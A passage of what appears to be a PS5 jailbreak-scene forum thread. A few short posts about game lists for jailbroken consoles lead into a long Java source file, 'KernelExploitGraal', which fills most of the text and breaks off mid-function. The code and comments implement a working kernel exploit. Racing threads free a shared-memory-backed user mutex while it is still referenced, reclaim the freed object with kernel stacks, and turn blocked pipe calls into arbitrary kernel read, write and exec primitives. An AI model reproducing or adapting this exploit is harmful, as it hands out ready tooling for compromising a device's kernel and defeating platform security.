mariokasas wrote: Is that last list the one with the PS5 backups? Can they be obtained anywhere?
DoctaIgnorantia wrote: Thread dedicated to the progress of the PS5 scene.
Please, let's avoid comments that are not related to the main purpose of the thread.
Off-topic thread: [OFF-TOPIC] Scene de PS5
List of Blu-ray games that can run on a PS5-JB (sorted by FW version):
List of game disks that will run on a jailbroken PS5
runouri wrote: DoctaIgnorantia wrote: Thread dedicated to the progress of the PS5 scene.
Please, let's avoid comments that are not related to the main purpose of the thread.
Off-topic thread: [OFF-TOPIC] Scene de PS5
List of Blu-ray games that can run on a PS5-JB (sorted by FW version):
List of game disks that will run on a jailbroken PS5
Hi DoctaIgnorantia,
One small thing (I'll delete this later, since I know these comments aren't allowed and I'm not contributing anything): could you add what the jailbreak or the other exploits do or could allow, or failing that, where we can read about it?
I'm reading this thread and I don't understand any of it (I'll Google it later, but it would be more convenient for everyone).
Thanks
package org.exploit;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicLong;
import java.util.Arrays;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Set;
import org.bootstrap.Log;
import org.bootstrap.LogHandler;
import org.exploit.libs.LibKernel;
import org.exploit.structs.Cpuset;
import org.exploit.structs.IoVec;
import org.exploit.structs.RtPrio;
import org.exploit.structs.TimeVal;
import org.exploit.structs.Uio;
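// Kernel exploit that races several threads over a user mutex (backed by a shared memory
// object) to end up with a dangling reference, reclaims the freed object with the kernel
// stack of a controlled "reclaim" thread, and then turns blocked pipe reads/writes on that
// thread into slow arbitrary kernel read/write primitives.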
class KernelExploitGraal implements KernelExploit {
// Configuration.
private static final boolean dumpKernelStackPartially = false;
private static final boolean dumpKernelStackOfReclaimThread = false;
private static final boolean dumpKernelStackPointers = false;
private static final boolean toggleSetThreadPriorities = false;
private static final boolean toggleEnableThreadPriorityForReclaimThreads = false;
private static final boolean toggleStoppingWorkingThreadsBeforeRemap = true;
private static final boolean toggleReclaimCpuAffinityMask = true;
private static final boolean toggleUnmappingOnFailure = false;
private static final boolean toggleBlockingSelect = true;
// Common parameters.
private static final int MAX_EXPLOITATION_ATTEMPTS = 100000;
private static final int MAX_SHARED_MEMORY_KEYS = 3;
private static final int MAX_DUMMY_SHARED_MEMORY_OBJECTS = 0;
private static final int MAX_DESTROYER_THREADS = 2;
private static final int MAX_RECLAIM_THREADS = 20;
private static final int MAX_RECLAIM_SYSTEM_CALLS = 1; // For `ioctl` method instead of `select`
private static final int MAX_SEARCH_LOOP_INVOCATIONS = toggleBlockingSelect ? 2 : 32;
private static final int MAX_EXTRA_USER_MUTEXES = 1;
private static final int MAX_DESCRIPTORS = 1000;
// Wait periods, in milliseconds, used at different steps.
private static final long INITIAL_WAIT_PERIOD = 50; // 50
private static final long KERNEL_STACK_WAIT_PERIOD = toggleBlockingSelect ? 100 : 250; // 50/250
private static final long TINY_WAIT_PERIOD = 50; // 50
// Special marker to determine victim thread's ID.
private static final int RECLAIM_THREAD_MARKER_BASE = 0x00414141;
// Special number that is multiplied by the file descriptor number to get the shared memory
// object size. Given this size, we can figure out the descriptor of the shared memory
// object that uses the dangling pointer.
private static final int MAGIC_NUMBER = 0x1000;
// Buffer size for the thread marker; it should not be larger than `SYS_IOCTL_SMALL_SIZE`,
// otherwise `sys_ioctl` will use the heap as storage instead of the stack.
private static final int THREAD_MARKER_BUFFER_SIZE = Constants.SYS_IOCTL_SMALL_SIZE;
// State size for reclaim threads.
private static final int MARKER_SIZE = toggleBlockingSelect ? 8 : THREAD_MARKER_BUFFER_SIZE;
private static final int STATE_SIZE = 2 * MARKER_SIZE;
// Pinned cores for each type of created threads.
private static Cpuset MAIN_THREAD_CORES = new Cpuset(0);
private static Cpuset[] DESTROYER_THREAD_CORES = new Cpuset[] { new Cpuset(1), new Cpuset(2) };
private static Cpuset LOOKUP_THREAD_CORES = new Cpuset(3);
// Priorities for such threads. `RTP_PRIO_FIFO` should also work.
private static RtPrio MAIN_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)256);
private static RtPrio DESTROYER_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)256); // 256
private static RtPrio LOOKUP_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)767); // 767, 400
private static RtPrio RECLAIM_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)450); // 450
// Number of times kernel thread's heap pointer should occur in kernel stack to
// distinguish it from other values on stack.
private static int KERNEL_THREAD_POINTER_OCCURRENCE_THRESHOLD = 10;
// Max length of reclaim thread name.
private static int MAX_RECLAIM_THREAD_NAME_SIZE = 0x10;
// Supported commands.
private static final int CMD_NOOP = 0;
private static final int CMD_READ = 1;
private static final int CMD_WRITE = 2;
private static final int CMD_EXEC = 3;
private static final int CMD_EXIT = 4;
//-------------------------------------------------------------------------
private static final Api api = Api.getInstance();
//-------------------------------------------------------------------------
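// Base class for all worker jobs: names the current pthread after the job and lets
// subclasses override the prepare/work/postprocess steps.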
private abstract static class CommonJob implements Runnable {
protected String jobName;
public void run() {
prepare();
work();
postprocess();
}
protected void prepare() {
// XXX: Setting name through `setName` method or constructor does not work for some reason.
ThreadUtil.pthreadSetCurrentThreadName(jobName);
}
protected void work() {
Thread.yield();
}
protected void postprocess() {
}
public String getJobName() {
return jobName;
}
}
//-------------------------------------------------------------------------
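// Destroyer jobs run pinned to their own cores and repeatedly try to destroy the primary
// user mutex at the same moment the lookup thread resolves it, racing to leave a dangling
// reference to the backing shared memory object.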
private class DestroyerJob extends CommonJob {
private int index;
public DestroyerJob(int index) {
this.index = index;
this.jobName = "destroyer#" + index;
}
protected void prepare() {
super.prepare();
// Move destroyer thread to separate core.
if (!ThreadUtil.setCurrentThreadCpuAffinity(DESTROYER_THREAD_CORES[index])) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
if (toggleSetThreadPriorities) {
// Set destroyer thread's priority, so it will run before lookup thread.
if (!ThreadUtil.setCurrentThreadPriority(DESTROYER_THREAD_PRIORITY)) {
throw Log.error("Setting priority for thread '" + jobName + "' failed");
}
}
}
protected void work() {
while (!raceDoneFlag.get()) {
Log.debug("[" + jobName + "] Starting loop");
Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
// Notify main thread that destroyer thread's loop is ready to start.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
// Trigger destroying of primary user mutex and check for result.
if (KernelHelper.destroyUserMutex(primarySharedMemoryKeyAddress)) {
// Notify that destroy was successful.
numDestructions.incrementAndGet();
} else {
Log.debug("[" + jobName + "] Performing destroy operation failed");
}
// Notify that the destroyer thread has done its main job.
numCompletedThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for check done flag");
while (!checkDoneFlag.get()) {
Thread.yield();
}
// Notify main thread that destroyer thread is ready to finish.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for done flag");
while (!doneFlag.get()) {
Thread.yield();
}
// Notify main thread that destroyer thread's loop was finished.
numFinishedThreads.incrementAndGet();
}
// Racing done, waiting for others.
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
Log.debug("[" + jobName + "] Finishing loop");
}
}
//-------------------------------------------------------------------------
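// The lookup job runs on its own core and resolves the primary user mutex back to a file
// descriptor while the destroyer threads tear it down; that descriptor is later used by
// `checkForCorruption` to detect whether the race succeeded.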
private class LookupJob extends CommonJob {
public LookupJob() {
jobName = "lookup";
}
protected void prepare() {
super.prepare();
// Move lookup thread to separate core.
if (!ThreadUtil.setCurrentThreadCpuAffinity(LOOKUP_THREAD_CORES)) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
if (toggleSetThreadPriorities) {
// Set lookup thread's priority, so it will run after destroyer threads.
if (!ThreadUtil.setCurrentThreadPriority(LOOKUP_THREAD_PRIORITY)) {
throw Log.error("Setting priority for thread '" + jobName + "' failed");
}
}
}
protected void work() {
while (!raceDoneFlag.get()) {
Log.debug("[" + jobName + "] Starting loop");
Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
// Notify main thread that lookup thread's loop is ready to start.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
// Trigger lookup of primary user mutex and check for result.
final int descriptor = KernelHelper.lookupUserMutex(primarySharedMemoryKeyAddress);
if (descriptor != -1) {
lookupDescriptor = descriptor;
Log.debug("[" + jobName + "] Lookup descriptor of primary shared memory object: " + descriptor);
} else {
Log.debug("[" + jobName + "] Performing lookup operation failed");
}
// Notify that the lookup thread has done its main job.
numCompletedThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for check done flag");
while (!checkDoneFlag.get()) {
Thread.yield();
}
// Notify main thread that lookup thread is ready to finish.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for done flag");
while (!doneFlag.get()) {
Thread.yield();
}
// Notify main thread that lookup thread's loop was finished.
numFinishedThreads.incrementAndGet();
}
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
Log.debug("[" + jobName + "] Finishing loop");
}
}
//-------------------------------------------------------------------------
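// Reclaim jobs spray kernel thread stacks hoping that one of them reuses the memory of the
// freed shared memory object. Each job plants a per-thread marker on its own kernel stack
// via a blocking `select` (or `ioctl`) call; when that marker is later spotted through the
// user-space mapping, the matching thread becomes the target that services the slow kernel
// read/write commands through blocked pipe calls.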
private class ReclaimJob extends CommonJob {
private final int index;
private final int marker;
private final long markerAddress;
private final long markerCopyAddress;
private Cpuset initialCpuAffinity;
private boolean isTarget;
private AtomicInteger currentCommand;
private AtomicBoolean commandWaitFlag;
private AtomicLong commandArg1;
private AtomicLong commandArg2;
private AtomicLong commandArg3;
private AtomicLong commandResult;
private AtomicInteger commandErrNo;
private Runnable commandRunnable;
public ReclaimJob(int index) {
this.index = index;
this.jobName = "reclaim#" + index;
this.marker = RECLAIM_THREAD_MARKER_BASE | ((0x41 + index + 1) << 24);
this.markerAddress = reclaimJobStatesAddress + index * STATE_SIZE;
this.markerCopyAddress = this.markerAddress + MARKER_SIZE;
this.isTarget = false;
}
protected void prepare() {
super.prepare();
initialCpuAffinity = ThreadUtil.getCurrentThreadCpuAffinity();
//Log.debug("Initial CPU affinity of '" + jobName + "' = " + initialCpuAffinity.getIndices().toString());
if (toggleReclaimCpuAffinityMask) {
if (!ThreadUtil.setCurrentThreadCpuAffinity(DESTROYER_THREAD_CORES[destroyerThreadIndex])) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
}
if (toggleSetThreadPriorities && toggleEnableThreadPriorityForReclaimThreads) {
if (!ThreadUtil.setCurrentThreadPriority(RECLAIM_THREAD_PRIORITY)) {
throw Log.error("Setting priority for thread '" + jobName + "' failed");
}
}
// Prepare thread marker which will be used to determine the victim thread ID: 41 41 41 [0x41 + index + 1]
if (toggleBlockingSelect) {
api.write64(markerAddress, TypeUtil.toUnsignedLong(marker) << 32);
} else {
final int count = MathUtil.divideUnsigned(THREAD_MARKER_BUFFER_SIZE, 4);
for (int i = 0; i < count; i++) {
api.write32(markerAddress + i * 0x4, marker);
}
}
}
protected void work() {
//Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
//Log.debug("[" + jobName + "] Starting loop");
// Wait loop that runs until kernel stack is obtained.
while (!destroyFlag.get()) {
//Log.debug("[" + jobName + "] Doing blocking call");
if (toggleBlockingSelect) {
// Use copy of marker because `select` may overwrite its contents.
api.copyMemory(markerCopyAddress, markerAddress, MARKER_SIZE);
LibKernel.select(1, markerCopyAddress, 0, 0, timeoutAddress);
} else {
final int fakeDescriptor = 0xBEEF;
for (int i = 0; i < MAX_RECLAIM_SYSTEM_CALLS; i++) {
LibKernel.ioctl(fakeDescriptor, Helpers.IOW(0, 0, THREAD_MARKER_BUFFER_SIZE), markerAddress);
}
}
Thread.yield();
// Check if leaked kernel stack belongs to this thread.
if (isTarget) {
Log.debug("[" + jobName + "] I am lucky");
if (toggleReclaimCpuAffinityMask) {
if (!ThreadUtil.setCurrentThreadCpuAffinity(initialCpuAffinity)) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
}
break;
}
}
//Log.debug("[" + jobName + "] Finishing loop");
if (isTarget) {
Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
// Lock execution temporarily using blocking call by reading from empty pipe.
Log.debug("[" + jobName + "] Reading from read pipe #" + readPipeDescriptor);
final long result = LibKernel.read(readPipeDescriptor, pipeBufferAddress, Api.MAX_PIPE_BUFFER_SIZE);
Log.debug("[" + jobName + "] Reading from read pipe #" + readPipeDescriptor + " finished with result " + TypeUtil.int64ToHex(result));
if (result == Api.MAX_PIPE_BUFFER_SIZE) {
Log.debug("[" + jobName + "] Starting command processor loop");
handleCommands();
Log.debug("[" + jobName + "] Stopping command processor loop");
} else if (result == -1L) {
api.warnMethodFailedPosix("read");
} else {
Log.warn("Unexpected result after reading from pipe " + TypeUtil.int64ToHex(result));
}
} else {
//Log.debug("[" + jobName + "] Not target thread");
}
}
public boolean unlockPipe() {
// Occupy the pipe buffer by writing to it, thus unlocking execution of the reclaim thread.
Log.debug("[" + jobName + "] Writing to write pipe #" + writePipeDescriptor);
final long result = LibKernel.write(writePipeDescriptor, pipeBufferAddress, Api.MAX_PIPE_BUFFER_SIZE);
Log.debug("[" + jobName + "] Writing to write pipe #" + writePipeDescriptor + " finished with result " + TypeUtil.int64ToHex(result));
if (result == -1L) {
api.warnMethodFailedPosix("write");
return false;
} else if (result != Api.MAX_PIPE_BUFFER_SIZE) {
Log.debug("Unexpected result after writing to pipe " + TypeUtil.int64ToHex(result));
return false;
}
return true;
}
public boolean isCommandProccesorRunning() {
return currentCommand != null && currentCommand.get() != CMD_EXIT;
}
private void handleCommands() {
commandWaitFlag = new AtomicBoolean(false);
commandArg1 = new AtomicLong(0);
commandArg2 = new AtomicLong(0);
commandArg3 = new AtomicLong(0);
commandResult = new AtomicLong(0);
commandErrNo = new AtomicInteger(0);
// Must be initialized last.
currentCommand = new AtomicInteger(CMD_NOOP);
while (true) {
final int cmd = currentCommand.get();
if (cmd != CMD_NOOP) {
currentCommand.set(CMD_NOOP);
commandResult.set(-1L);
commandErrNo.set(0);
switch (cmd) {
case CMD_READ:
//Log.debug("[" + jobName + "] Processing read command");
handleCommandRead(commandArg1.get(), commandArg2.get(), commandArg3.get());
//Log.debug("[" + jobName + "] Done processing read command");
break;
case CMD_WRITE:
//Log.debug("[" + jobName + "] Processing write command");
handleCommandWrite(commandArg1.get(), commandArg2.get(), commandArg3.get());
//Log.debug("[" + jobName + "] Done processing write command");
break;
case CMD_EXEC:
//Log.debug("[" + jobName + "] Processing exec command");
handleCommandExec();
//Log.debug("[" + jobName + "] Done processing exec command");
break;
default:
throw Log.error("[" + jobName + "] Unsupported command: " + cmd);
}
commandWaitFlag.set(false);
}
Thread.yield();
}
}
private void handleCommandRead(long srcAddress, long dstAddress, long size) {
//Log.debug("[" + jobName + "] Doing blocking write");
Thread.yield();
// Do blocking write pipe call.
final long result = LibKernel.write(writePipeDescriptor, pipeBufferAddress, size);
//Log.debug("[" + jobName + "] Finishing blocking write");
commandResult.set(result);
commandErrNo.set(api.getLastErrNo());
}
private void handleCommandWrite(long srcAddress, long dstAddress, long size) {
//Log.debug("[" + jobName + "] Doing blocking read");
Thread.yield();
// Do blocking read pipe call.
final long result = LibKernel.read(readPipeDescriptor, pipeBufferAddress, size);
//Log.debug("[" + jobName + "] Finishing blocking read");
commandResult.set(result);
commandErrNo.set(api.getLastErrNo());
}
private void handleCommandExec() {
if (commandRunnable != null) {
commandRunnable.run();
commandRunnable = null;
}
}
public void setTarget(boolean flag) {
isTarget = flag;
}
public boolean isTarget() {
return isTarget;
}
public int getCommand() {
return currentCommand.get();
}
public void setCommand(int cmd) {
Checks.ensureTrue(cmd >= CMD_NOOP && cmd <= CMD_EXIT);
currentCommand.set(cmd);
}
public boolean getCommandWaitFlag() {
return commandWaitFlag.get();
}
public void setCommandWaitFlag(boolean flag) {
commandWaitFlag.set(flag);
}
public long getCommandArg(int index) {
Checks.ensureTrue(index >= 0 && index <= 2);
switch (index) {
case 0:
return commandArg1.get();
case 1:
return commandArg2.get();
case 2:
return commandArg3.get();
default:
return 0;
}
}
public void setCommandArg(int index, long arg) {
Checks.ensureTrue(index >= 0 && index <= 2);
switch (index) {
case 0:
commandArg1.set(arg);
break;
case 1:
commandArg2.set(arg);
break;
case 2:
commandArg3.set(arg);
break;
}
}
public long getCommandResult() {
return commandResult.get();
}
public int getCommandErrNo() {
return commandErrNo.get();
}
public void setCommandRunnable(Runnable runnable) {
commandRunnable = runnable;
}
}
//-------------------------------------------------------------------------
private long scratchBufferAddress;
private long pipeBufferAddress;
private long ioVecAddress;
private long uioAddress;
private long primarySharedMemoryKeyAddress;
private long secondarySharedMemoryKeyAddress;
private long extraSharedMemoryKeyAddress;
private long statAddress;
private long timeoutAddress;
private long markerPatternAddress;
private long threadNameAddress;
private long reclaimJobStatesAddress;
private List<Thread> destroyerThreads;
private Thread lookupThread;
private List<Runnable> reclaimJobs;
private List<Thread> reclaimThreads;
private ReclaimJob targetReclaimJob;
private Thread targetReclaimThread;
private AtomicBoolean raceDoneFlag;
private AtomicBoolean readyFlag;
private AtomicBoolean destroyFlag;
private AtomicBoolean checkDoneFlag;
private AtomicBoolean doneFlag;
private AtomicInteger numReadyThreads;
private AtomicInteger numCompletedThreads;
private AtomicInteger numFinishedThreads;
private AtomicInteger numDestructions;
private int pipeBufferCapacity;
private int readPipeDescriptor;
private int writePipeDescriptor;
private int initialOriginalDescriptor;
private int originalDescriptor;
private int lookupDescriptor;
private int winnerDescriptor;
private int[] reclaimDescriptors;
private int destroyerThreadIndex;
private Set<Integer> usedDescriptors;
private Set<Long> mappedKernelStackAddresses;
private long mappedReclaimKernelStackAddress;
private MemoryBuffer stackDataBuffer;
private IoVec ioVec;
private Uio uio;
private boolean exploited;
public KernelExploitGraal() {
assert DESTROYER_THREAD_CORES.length == MAX_DESTROYER_THREADS;
}
//-------------------------------------------------------------------------
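// Top-level driver: retries the racing stage up to MAX_EXPLOITATION_ATTEMPTS times and, once
// memory corruption is obtained, runs post-exploitation. Returns the number of attempts used
// on success, 0 if all attempts failed, or -1 if preparation failed.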
public int run(LogHandler debugLogHandler) {
if (!prepareExploit()) {
Log.warn("Preparing for exploitation failed");
return -1;
}
boolean exploited = false;
int i = 0;
for (; i < MAX_EXPLOITATION_ATTEMPTS; i++) {
if (initialExploit()) {
// XXX: We enable debug logging only for post-exploitation because initial exploitation with verbose logging takes a lot of time.
int oldSeverity = -1;
if (debugLogHandler != null) {
oldSeverity = debugLogHandler.setVerbosityLevel(Log.DEBUG);
}
Log.info("Doing post-exploitation");
if (postExploit()) {
exploited = true;
} else {
Log.warn("Post-exploitation failed");
}
if (debugLogHandler != null) {
debugLogHandler.setVerbosityLevel(oldSeverity);
}
} else {
Log.warn("Exploitation attempt #" + i + " failed");
}
if (exploited) {
break;
}
// Force kick of garbage collector.
System.gc();
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
}
return exploited ? (i + 1) : 0;
}
//-------------------------------------------------------------------------
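// One-time setup: lays out the scratch buffer that backs all user-space structures (pipe
// buffer, iovec/uio, shared memory keys, stat, timeout, marker pattern, thread name and
// reclaim thread states), creates the pipe used for kernel primitives, optionally creates
// dummy shared memory objects, and pins the main thread to its core.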
private boolean prepareExploit() {
//
// Prepare scratch buffer and auxiliary things.
//
pipeBufferCapacity = api.getPipeBufferCapacity();
final int scratchBufferSize = pipeBufferCapacity + Offsets.sizeOf_iovec + Offsets.sizeOf_uio + Offsets.sizeOf_pipebuf * 2 + MAX_SHARED_MEMORY_KEYS * 8 + Offsets.sizeOf_stat + Offsets.sizeOf_timeval + 0x8 + MAX_RECLAIM_THREAD_NAME_SIZE + STATE_SIZE * MAX_RECLAIM_THREADS;
scratchBufferAddress = api.allocateMemory(scratchBufferSize);
pipeBufferAddress = scratchBufferAddress + 0x0;
ioVecAddress = pipeBufferAddress + pipeBufferCapacity;
uioAddress = ioVecAddress + Offsets.sizeOf_iovec;
primarySharedMemoryKeyAddress = uioAddress + Offsets.sizeOf_uio;
secondarySharedMemoryKeyAddress = primarySharedMemoryKeyAddress + 0x8;
extraSharedMemoryKeyAddress = secondarySharedMemoryKeyAddress + 0x8;
statAddress = extraSharedMemoryKeyAddress + 0x8;
timeoutAddress = statAddress + Offsets.sizeOf_stat;
markerPatternAddress = timeoutAddress + Offsets.sizeOf_timeval;
threadNameAddress = markerPatternAddress + 0x8;
reclaimJobStatesAddress = threadNameAddress + MAX_RECLAIM_THREAD_NAME_SIZE;
raceDoneFlag = new AtomicBoolean();
readyFlag = new AtomicBoolean();
destroyFlag = new AtomicBoolean();
checkDoneFlag = new AtomicBoolean();
doneFlag = new AtomicBoolean();
numReadyThreads = new AtomicInteger();
numCompletedThreads = new AtomicInteger();
numFinishedThreads = new AtomicInteger();
numDestructions = new AtomicInteger();
initialOriginalDescriptor = -1;
originalDescriptor = -1;
lookupDescriptor = -1;
winnerDescriptor = -1;
reclaimDescriptors = new int[MAX_DESTROYER_THREADS];
for (int i = 0; i < reclaimDescriptors.length; i++) {
reclaimDescriptors[i] = -1;
}
destroyerThreadIndex = -1;
usedDescriptors = new HashSet<Integer>();
mappedKernelStackAddresses = new HashSet<Long>();
mappedReclaimKernelStackAddress = 0;
ioVec = new IoVec();
uio = new Uio();
api.write32(markerPatternAddress, RECLAIM_THREAD_MARKER_BASE);
//
// Create pipe to use for kernel primitives.
//
Log.debug("Creating pipe for kernel primitives");
final int[] pipe = KernelHelper.createPipe();
if (pipe == null) {
Log.warn("Creating pipe for kernel primitives failed");
return false;
}
readPipeDescriptor = pipe[0];
Log.debug("Descriptor of read pipe: " + readPipeDescriptor);
writePipeDescriptor = pipe[1];
Log.debug("Descriptor of write pipe: " + writePipeDescriptor);
//
// Prepare dummy shared memory objects (if needed).
//
final int[] dummyDescriptors = new int[MAX_DUMMY_SHARED_MEMORY_OBJECTS];
final long mappedSize = Constants.KERNEL_STACK_SIZE;
for (int i = 0; i < dummyDescriptors.length; i++) {
Log.debug("Creating dummy shared memory object #" + i);
int descriptor = KernelHelper.createSharedMemoryAnonymous();
if (descriptor != -1) {
Log.debug("Descriptor of dummy shared memory object #" + i + ": " + descriptor);
Log.debug("Truncating dummy shared memory object #" + i);
if (KernelHelper.truncateSharedMemory(descriptor, mappedSize)) {
Log.debug("Mapping memory of dummy shared memory object #" + i);
final long address = KernelHelper.mapMemoryWithDescriptor(0, mappedSize, descriptor, 0);
if (address != 0L) {
Log.debug("Touching dummy shared memory object #" + i + " at " + TypeUtil.int64ToHex(address));
api.write32(address, i);
dummyDescriptors[i] = descriptor;
descriptor = -1;
Log.debug("Unmapping memory of dummy shared memory object #" + i);
if (!KernelHelper.unmapMemory(address, mappedSize)) {
Log.warn("Unmapping memory of dummy shared memory object #" + i + " failed");
}
} else {
Log.warn("Mapping memory of dummy shared memory object #" + i + " failed");
}
} else {
Log.warn("Truncating dummy shared memory object #" + i + " failed");
}
if (descriptor != -1) {
Log.debug("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
Log.warn("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i + " failed");
}
dummyDescriptors[i] = -1;
}
} else {
Log.warn("Creating dummy shared memory object #" + i + " failed");
return false;
}
}
for (int i = 0; i < dummyDescriptors.length; i++) {
final int descriptor = dummyDescriptors[i];
if (descriptor == -1) {
continue;
}
Log.debug("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
Log.warn("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i + " failed");
}
dummyDescriptors[i] = -1;
}
//
// Initial set up of threads.
//
destroyerThreads = new ArrayList<Thread>();
reclaimJobs = new ArrayList<Runnable>();
reclaimThreads = new ArrayList<Thread>();
// Set moderate timeout to avoid locks.
final TimeVal timeout = new TimeVal(0, 500000); // 0.5 seconds = 500000 microseconds
timeout.serialize(timeoutAddress);
if (!ThreadUtil.setCurrentThreadCpuAffinity(MAIN_THREAD_CORES)) {
Log.warn("Pinning main thread to specific core failed");
return false;
}
if (toggleSetThreadPriorities) {
if (!ThreadUtil.setCurrentThreadPriority(MAIN_THREAD_PRIORITY)) {
Log.warn("Setting priority for main thread failed");
return false;
}
}
return true;
}
private void resetState() {
raceDoneFlag.set(false);
readyFlag.set(false);
destroyFlag.set(false);
checkDoneFlag.set(false);
doneFlag.set(false);
numReadyThreads.set(0);
numCompletedThreads.set(0);
numFinishedThreads.set(0);
numDestructions.set(0);
originalDescriptor = -1;
lookupDescriptor = -1;
winnerDescriptor = -1;
for (int i = 0; i < reclaimDescriptors.length; i++) {
reclaimDescriptors[i] = -1;
}
destroyerThreadIndex = -1;
}
private void cleanupState() {
for (int i = 0; i < reclaimDescriptors.length; i++) {
final int descriptor = reclaimDescriptors[i];
if (descriptor == -1) {
continue;
}
Log.debug("[main] Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
Log.debug("[main] Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i + " failed");
}
reclaimDescriptors[i] = -1;
}
if (lookupDescriptor != -1) {
Log.debug("[main] Closing lookup descriptor #" + lookupDescriptor + " of primary shared memory object");
if (!KernelHelper.closeDescriptor(lookupDescriptor)) {
Log.debug("[main] Closing lookup descriptor #" + lookupDescriptor + " of primary shared memory object failed");
}
lookupDescriptor = -1;
}
Log.debug("[main] Attempting to destroy secondary user mutex");
if (KernelHelper.destroyUserMutex(secondarySharedMemoryKeyAddress)) {
Log.debug("[main] Attempting to destroy secondary user mutex unexpectedly succeeded");
}
Log.debug("[main] Attempting to destroy primary user mutex");
if (KernelHelper.destroyUserMutex(primarySharedMemoryKeyAddress)) {
Log.debug("[main] Attempting to destroy primary user mutex unexpectedly succeeded");
}
}
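// Detects corruption by reading the size of the shared memory object through the lookup
// descriptor: every object is truncated to (descriptor * MAGIC_NUMBER), so dividing the
// observed size by MAGIC_NUMBER recovers the descriptor that last truncated it. A mismatch
// with both the original and the lookup descriptor means some other descriptor now refers
// to the same underlying object.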
private int checkForCorruption() {
if (originalDescriptor == -1) {
Log.debug("[main] Original descriptor of primary shared memory object not found");
return -1;
}
Log.debug("[main] Original descriptor of primary shared memory object: " + originalDescriptor);
if (lookupDescriptor == -1) {
Log.debug("[main] Lookup descriptor of primary shared memory object not found");
return -1;
}
Log.debug("[main] Lookup descriptor of primary shared memory object: " + lookupDescriptor);
usedDescriptors.add(new Integer(lookupDescriptor));
final long size = KernelHelper.getFileSize(lookupDescriptor, statAddress);
if (size == -1L) {
Log.debug("[main] Getting size of primary shared memory object failed");
return -1;
}
Log.debug("[main] Size of primary shared memory object: " + TypeUtil.int64ToHex(size));
final int descriptor = (int)MathUtil.divideUnsigned(size, MAGIC_NUMBER);
if (descriptor > MAX_DESCRIPTORS) {
Log.debug("[main] Calculated descriptor is too large: #" + descriptor);
return -1;
}
Log.debug("[main] Calculated descriptor #" + descriptor);
if (descriptor != originalDescriptor && descriptor != lookupDescriptor) {
Log.debug("[main] Got mismatch of descriptors!");
return descriptor;
}
return -1;
}
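// Racing stage: repeatedly creates the primary user mutex, lets the destroyer threads destroy
// it while the lookup thread resolves it, then sprays secondary user mutexes from the
// destroyer cores and checks whether one of their descriptors now aliases the primary object.
// On success the aliased ("winner") descriptor and the destroyer core it was created on are
// recorded for post-exploitation.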
private boolean initialExploit() {
stackDataBuffer = null;
resetState();
//
// Prepare destroyer, lookup and reclaim threads.
//
Log.debug("Creating destroyer threads");
for (int i = 0; i < MAX_DESTROYER_THREADS; i++) {
//Log.debug("Creating destroyer thread #" + i);
final Thread thread = new Thread(new DestroyerJob(i));
destroyerThreads.add(thread);
}
Log.debug("Creating lookup thread");
lookupThread = new Thread(new LookupJob());
for (int i = 0; i < MAX_DESTROYER_THREADS; i++) {
final Thread thread = destroyerThreads.get(i);
//Log.debug("Starting destroyer thread #" + i);
thread.start();
}
Log.debug("Starting lookup thread");
lookupThread.start();
Log.debug("Creating reclaim threads");
for (int i = 0; i < MAX_RECLAIM_THREADS; i++) {
//Log.debug("Creating reclaim thread #" + i);
final Runnable runnable = new ReclaimJob(i);
reclaimJobs.add(runnable);
final Thread thread = new Thread(runnable);
reclaimThreads.add(thread);
}
ThreadUtil.sleepMs(INITIAL_WAIT_PERIOD);
//
// Initial exploitation that does memory corruption.
//
Log.debug("[main] Resetting state");
resetState();
int numIterations = 0;
while (!raceDoneFlag.get()) {
Log.debug("[main] Starting loop");
Log.debug("[main] Creating primary user mutex");
int descriptor = KernelHelper.createUserMutex(primarySharedMemoryKeyAddress);
if (descriptor == -1) {
throw Log.error("[main] Creating primary user mutex failed");
}
Log.debug("[main] Original descriptor of primary shared memory object: " + descriptor);
originalDescriptor = descriptor;
if (initialOriginalDescriptor == -1) {
initialOriginalDescriptor = descriptor;
}
// Set size of primary shared memory object, so we can find its descriptor later (see comments for `MAGIC_NUMBER`).
Log.debug("[main] Truncating primary shared memory object");
if (!truncateSharedMemorySpecial(descriptor)) {
throw Log.error("[main] Truncating primary shared memory object failed");
}
// Close this descriptor to decrement reference counter of primary shared memory object.
